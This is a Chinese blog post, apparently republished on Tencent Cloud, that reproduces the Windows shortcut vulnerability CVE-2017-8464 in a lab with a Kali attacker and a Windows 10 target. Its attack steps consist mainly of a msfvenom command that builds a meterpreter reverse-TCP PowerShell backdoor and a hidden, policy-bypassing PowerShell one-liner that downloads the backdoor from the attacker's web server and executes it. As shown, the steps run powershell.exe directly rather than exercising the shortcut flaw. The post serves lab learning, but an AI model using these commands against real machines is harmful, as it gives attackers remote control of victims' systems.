前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2017-8464漏洞复现

CVE-2017-8464漏洞复现

作者头像
墙角睡大觉
发布2019-09-24 15:59:24
8390
发布2019-09-24 15:59:24
举报
文章被收录于专栏:安全漏洞环境学习

CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

0X1环境搭建

攻击机:kali

靶 机:Win10 x64位

0X2 漏洞利用

生成一个ps后门程序:

msfvenom -p windows/x64/meterpreter/reverse_tcplhost=172.16.1.44 lport=5555 -f psh-reflection>/root/search.ps1

复制到web目录下:

启动web服务查看:

在windows10上创建一个快捷方式:

powershell -windowstyle hidden -exec bypass -c "IEX(New-ObjectNet.WebClient).DownloadString('http://172.16.1.44/search.ps1');test.ps1"

Kali下使用metasploit设置攻击参数

开始攻击,并在windows10下点击powershell.exe

测试成功!

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-02-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档